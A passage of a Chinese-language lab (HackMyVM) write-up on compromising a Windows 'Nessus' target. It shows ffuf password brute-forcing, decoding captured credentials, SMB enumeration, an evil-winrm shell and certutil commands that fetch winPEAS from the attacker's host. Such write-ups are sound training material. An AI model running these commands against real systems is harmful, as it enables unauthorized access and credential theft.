2025:06:09 03:48:23-04:00\nFile Inode Change Date\/Time     : 2025:06:09 03:48:22-04:00\nFile Permissions                : -rw-r--r--\nFile Type                       : PDF\nFile Type Extension             : pdf\nMIME Type                       : application\/pdf\nLinearized                      : No\nPage Count                      : 6\nProfile CMM Type                : Little CMS\nProfile Version                 : 2.3.0\nProfile Class                   : Display Device Profile\nColor Space Data                : RGB\nProfile Connection Space        : XYZ\nProfile Date Time               : 2004:08:13 12:18:06\nProfile File Signature          : acsp\nPrimary Platform                : Microsoft Corporation\nCMM Flags                       : Not Embedded, Independent\nDevice Manufacturer             : Little CMS\nDevice Model                    : \nDevice Attributes               : Reflective, Glossy, Positive, Color\nRendering Intent                : Perceptual\nConnection Space Illuminant     : 0.9642 1 0.82491\nProfile Creator                 : Little CMS\nProfile ID                      : 7fb30d688bf82d32a0e748daf3dba95d\nDevice Mfg Desc                 : lcms generated\nProfile Description             : sRGB\nDevice Model Desc               : sRGB\nMedia White Point               : 0.95015 1 1.08826\nRed Matrix Column               : 0.43585 0.22238 0.01392\nBlue Matrix Column              : 0.14302 0.06059 0.71384\nGreen Matrix Column             : 0.38533 0.71704 0.09714\nRed Tone Reproduction Curve     : (Binary data 2060 bytes, use -b option to extract)\nGreen Tone Reproduction Curve   : (Binary data 2060 bytes, use -b option to extract)\nBlue Tone Reproduction Curve    : (Binary data 2060 bytes, use -b option to extract)\nChromaticity Channels           : 3\nChromaticity Colorant           : Unknown\nChromaticity Channel 1          : 0.64 0.33\nChromaticity Channel 2          : 0.3 0.60001\nChromaticity Channel 3          : 0.14999 0.06\nProfile Copyright               : no copyright, use freely\nXMP Toolkit                     : Image::ExifTool 12.76\nDate                            : 2024:10:18 15:10:19+02:00\nFormat                          : application\/pdf\nLanguage                        : x-unknown\nAuthor                          : Jose\nPDF Version                     : 1.4\nProducer                        : Apache FOP Version 2.8\nCreate Date                     : 2024:10:18 15:10:19+02:00\nCreator Tool                    : Apache FOP Version 2.8\nMetadata Date                   : 2024:10:18 15:10:19+02:00\nPage Mode                       : UseOutlines\nCreator                         : Apache FOP Version 2.8\n    3 image files read<\/code><\/pre>\n<h3>\u7206\u7834\u767b\u5f55\u4fe1\u606f<\/h3>\n<p>\u53d1\u73b0\u4e86\u4f5c\u8005\u4fe1\u606f\u4e3a<code>Jose<\/code>\uff0c\u5c1d\u8bd5\u6293\u5305\u7206\u7834\u90a3\u4e2a\u767b\u5f55\u754c\u9762\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011599.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011599.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609160352560\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u77e5\u9053\u4e86\u53c2\u6570\u5c31\u53ef\u4ee5\u8fdb\u884c\u6d4b\u8bd5\u4e86<\/p>\n<pre><code class=\"language-bash\">{&quot;username&quot;:&quot;username&quot;,&quot;password&quot;:&quot;password&quot;}<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011600.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011600.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609161521148\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u54cd\u5e94\u5305\u5219\u4e3a\uff1a<\/p>\n<pre><code class=\"language-bash\">{&quot;error&quot;:&quot;Invalid Credentials&quot;}<\/code><\/pre>\n<p>\u5c1d\u8bd5\u7206\u7834\u4e00\u4e0b\u5427\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011601.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011601.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609165437812\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5f97\u5230\u5bc6\u7801\uff1a<code>tequiero<\/code>\u3002\u4e5f\u53ef\u4ee5\u4f7f\u7528\u522b\u7684\u529e\u6cd5\u6bd4\u5982\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Nessus]\n\u2514\u2500$ ffuf -u &#039;https:\/\/192.168.10.100:8834\/session&#039; -w \/usr\/share\/wordlists\/rockyou.txt -d &#039;{&quot;username&quot;:&quot;jose&quot;,&quot;password&quot;:&quot;FUZZ&quot;}&#039; -H &#039;Content-Type: application\/json&#039; -fc 401\n\n        \/&#039;___\\  \/&#039;___\\           \/&#039;___\\       \n       \/\\ \\__\/ \/\\ \\__\/  __  __  \/\\ \\__\/       \n       \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\      \n        \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/      \n         \\ \\_\\   \\ \\_\\  \\ \\____\/  \\ \\_\\       \n          \\\/_\/    \\\/_\/   \\\/___\/    \\\/_\/       \n\n       v2.1.0-dev\n________________________________________________\n\n :: Method           : POST\n :: URL              : https:\/\/192.168.10.100:8834\/session\n :: Wordlist         : FUZZ: \/usr\/share\/wordlists\/rockyou.txt\n :: Header           : Content-Type: application\/json\n :: Data             : {&quot;username&quot;:&quot;jose&quot;,&quot;password&quot;:&quot;FUZZ&quot;}\n :: Follow redirects : false\n :: Calibration      : false\n :: Timeout          : 10\n :: Threads          : 40\n :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter           : Response status: 401\n________________________________________________\n\ntequiero                [Status: 200, Size: 179, Words: 1, Lines: 1, Duration: 1796ms]<\/code><\/pre>\n<p>\u6211\u5c1d\u8bd5\u4e86hydra\u4f46\u662f\u603b\u662f\u62a5\u9519\u3002\u3002\u3002<\/p>\n<h3>\u767b\u5f55\u83b7\u53d6\u8ba4\u8bc1\u4fe1\u606f<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011602.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011602.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609172140160\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011603.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011603.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609172224517\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u4fee\u6539\u524d\u7aef\uff0c\u770b\u770b\u80fd\u4e0d\u80fd\u663e\u793a\u5bc6\u7801\uff0c\u4f46\u662f\u5931\u8d25\u4e86\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011604.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011604.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609173049200\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u4fee\u6539\u76f8\u5173\u53c2\u6570\uff0c\u4f7f\u5176\u94fe\u63a5\u5230kali\u4e0a\u53bb\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011605.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011605.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609172424660\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011606.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011606.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609172439004\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u672a\u53d1\u9001\u8ba4\u8bc1\u4fe1\u606f\uff0c\u5207\u6362\u4e00\u4e0b<code>Auth Method<\/code>\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011607.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011607.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609172926474\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011608.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011608.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609173102531\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u663e\u793a\u4e86\u4e00\u4e2a basic \u8ba4\u8bc1\u4fe1\u606f\uff0c\u8fdb\u884c\u7834\u8bd1\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Nessus]\n\u2514\u2500$ echo &quot;bmVzdXM6WiNKdVhIJHBoLTt2QCxYJm1WKQ==&quot; | base64 -d\nnesus:Z#JuXH$ph-;v@,X&amp;mV) <\/code><\/pre>\n<p>\u62ff\u5230\u767b\u5f55\u51ed\u8bc1\uff0c\u5c1d\u8bd5ssh\u767b\u5f55\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Nessus]\n\u2514\u2500$ ssh nesus@$IP    \nssh: connect to host 192.168.10.100 port 22: Connection refused<\/code><\/pre>\n<p>\u7a81\u7136\u60f3\u8d77\u6765\u672a\u5f00\u653e\u76f8\u5173\u7aef\u53e3\u3002\u3002\u3002\u3002<\/p>\n<h3>smb\u670d\u52a1\u63a2\u6d4b<\/h3>\n<p>\u518d\u6b21\u8fdb\u884c\u670d\u52a1\u63a2\u6d4b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Nessus]\n\u2514\u2500$ crackmapexec smb $IP --groups --loggedon-users -u nesus -p &#039;Z#JuXH$ph-;v@,X&amp;mV)&#039;\nSMB         192.168.10.100  445    NESSUS           [*] Windows Server 2022 Build 20348 x64 (name:NESSUS) (domain:Nessus) (signing:False) (SMBv1:False)\nSMB         192.168.10.100  445    NESSUS           [-] Nessus\\nesus:Z#JuXH$ph-;v@,X&amp;mV) STATUS_PASSWORD_EXPIRED<\/code><\/pre>\n<p>windows\u9776\u673a\u7684\u5e38\u89c1bug\uff0c\u8ba4\u8bc1\u8fc7\u671f\u4e86\uff0c\u5c1d\u8bd5\u91cd\u7f6e\u5bc6\u7801\u8fdb\u884c\u66f4\u65b0\u9776\u673a\uff1a<\/p>\n<p><code>ctrl+alt+del<\/code>(virtualbox \u91cc\u9762\u662f\u53f3\u952ectrl+del)\u89e3\u9501\uff0c\u7136\u540e\u6309esc\u8fd4\u56de\u4e0a\u4e00\u7ea7\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011610.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011610.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609174157784\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u70b9\u51fb<code>nesus<\/code>\uff0c\u7136\u540e\u8f93\u5165\u5bc6\u7801\u4ee5\u540e\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011611.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011611.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609174312361\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p><code>enter<\/code>\u4e00\u4e0b\uff0c\u6362\u5b8c\u5bc6\u7801\u4ee5\u540e\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011612.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011612.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609174420481\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8fd9\u91cc\u518d<code>enter<\/code>\u4e00\u4e0b\uff0c\u6211\u4fee\u6539\u7684\u662f<code>password<\/code>\uff0c\u5982\u679c\u8fd9\u4e2a\u6b65\u9aa4\u8fd8\u770b\u4e0d\u61c2\uff0c\u53ef\u4ee5\u53c2\u8003\u4e4b\u524d\u7684\u4e00\u4e2awp\uff1a<\/p>\n<blockquote>\n<p><a href=\"https:\/\/hgbe02.github.io\/Hackmyvm\/DC01.html#hash%E7%A2%B0%E6%92%9E\">https:\/\/hgbe02.github.io\/Hackmyvm\/DC01.html#hash%E7%A2%B0%E6%92%9E<\/a><\/p>\n<\/blockquote>\n<p>\u7ee7\u7eed\uff0c\u6210\u529f\u4e86\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Nessus]\n\u2514\u2500$ crackmapexec smb $IP --groups --loggedon-users -u nesus -p password             \nSMB         192.168.10.100  445    NESSUS           [*] Windows Server 2022 Build 20348 x64 (name:NESSUS) (domain:Nessus) (signing:False) (SMBv1:False)\nSMB         192.168.10.100  445    NESSUS           [+] Nessus\\nesus:password \nSMB         192.168.10.100  445    NESSUS           [+] Enumerated loggedon users\nSMB         192.168.10.100  445    NESSUS           [-] Error enumerating domain group using dc ip 192.168.10.100: socket connection error while opening: [Errno 111] Connection refused<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Nessus]\n\u2514\u2500$ smbmap -u nesus -p password -H 192.168.10.100              \n\n    ________  ___      ___  _______   ___      ___       __         _______\n   \/&quot;       )|&quot;  \\    \/&quot;  ||   _  &quot;\\ |&quot;  \\    \/&quot;  |     \/&quot;&quot;\\       |   __ &quot;\\\n  (:   \\___\/  \\   \\  \/\/   |(. |_)  :) \\   \\  \/\/   |    \/    \\      (. |__) :)\n   \\___  \\    \/\\  \\\/.    ||:     \\\/   \/\\   \\\/.    |   \/&#039; \/\\  \\     |:  ____\/\n    __\/  \\   |: \\.        |(|  _  \\  |: \\.        |  \/\/  __&#039;  \\    (|  \/\n   \/&quot; \\   :) |.  \\    \/:  ||: |_)  :)|.  \\    \/:  | \/   \/  \\   \\  \/|__\/ \\\n  (_______\/  |___|\\__\/|___|(_______\/ |___|\\__\/|___|(___\/    \\___)(_______)\n-----------------------------------------------------------------------------\nSMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - ShawnDEvans@gmail.com\n                     https:\/\/github.com\/ShawnDEvans\/smbmap\n\n[*] Detected 1 hosts serving SMB                                                                                                  \n[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                          \n\n[+] IP: 192.168.10.100:445      Name: 192.168.10.100            Status: Authenticated\n        Disk                                                    Permissions     Comment\n        ----                                                    -----------     -------\n        ADMIN$                                                  NO ACCESS       Remote Admin\n        C$                                                      NO ACCESS       Default share\n        Documents                                               READ, WRITE\n        IPC$                                                    READ ONLY       Remote IPC\n[*] Closed 1 connections                          <\/code><\/pre>\n<p>\u4e00\u5207\u6b63\u5e38\uff0c\u5c1d\u8bd5\u4f7f\u7528<code>evil-winrm<\/code>\u8fdb\u884c\u8fde\u63a5\u5427\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011613.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011613.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609175412420\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6210\u529f\uff01<\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<p>\u786e\u5b9e\u4e0d\u719f\u7ec3\uff0c\u5e38\u89c1\u6307\u4ee4\u4e22\u4e0a\u53bb\u6211\u4e5f\u770b\u4e0d\u592a\u660e\u767d\uff0c\u76f4\u63a5\u4e0a<code>winPEAS<\/code>\uff01<\/p>\n<pre><code class=\"language-bash\">*Evil-WinRM* PS C:\\Users\\nesus\\Documents&gt; cd ..\/Desktop\n*Evil-WinRM* PS C:\\Users\\nesus\\Desktop&gt; dir\n\n    Directory: C:\\Users\\nesus\\Desktop\n\nMode                 LastWriteTime         Length Name\n----                 -------------         ------ ----\n-a----        10\/18\/2024   1:41 PM             33 user.txt\n\n*Evil-WinRM* PS C:\\Users\\nesus\\Desktop&gt; type user.txt\n72113f41d43e88eb5d67f732668bc3d1\n*Evil-WinRM* PS C:\\Users\\nesus\\Desktop&gt; certutil -urlcache -split -f http:\/\/192.168.10.106:8888\/winPEAS.exe\nProgram &#039;certutil.exe&#039; failed to run: Access is deniedAt line:1 char:1\n+ certutil -urlcache -split -f http:\/\/192.168.10.106:8888\/winPEAS.exe\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.\nAt line:1 char:1\n+ certutil -urlcache -split -f http:\/\/192.168.10.106:8888\/winPEAS.exe\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException\n    + FullyQualifiedErrorId : NativeCommandFailed\n*Evil-WinRM* PS C:\\Users\\nesus\\Desktop&gt; upload ..\/winPEAS.exe winPEAS.exe\n\nInfo: Uploading \/home\/kali\/temp\/Nessus\/..\/winPEAS.exe to C:\\Users\\nesus\\Desktop\\winPEAS.exe\n\nData: 629416 bytes of 629416 bytes copied\n\nInfo: Upload successful!\n*Evil-WinRM* PS C:\\Users\\nesus\\Desktop&gt; certutil -urlcache -split -f http:\/\/192.168.10.106:8888\/winPEAS.exe\nProgram &#039;certutil.exe&#039; failed to run: Access is deniedAt line:1 char:1\n+ certutil -urlcache -split -f http:\/\/192.168.10.106:8888\/winPEAS.exe\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.\nAt line:1 char:1\n+ certutil -urlcache -split -f http:\/\/192.168.10.106:8888\/winPEAS.exe\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException\n    + FullyQualifiedErrorId : NativeCommandFailed\n\n*Evil-WinRM* PS C:\\Users\\nesus\\Desktop&gt; dir\n\n    Directory: C:\\Users\\nesus\\Desktop\n\nMode                 LastWriteTime         Length Name\n----                 -------------         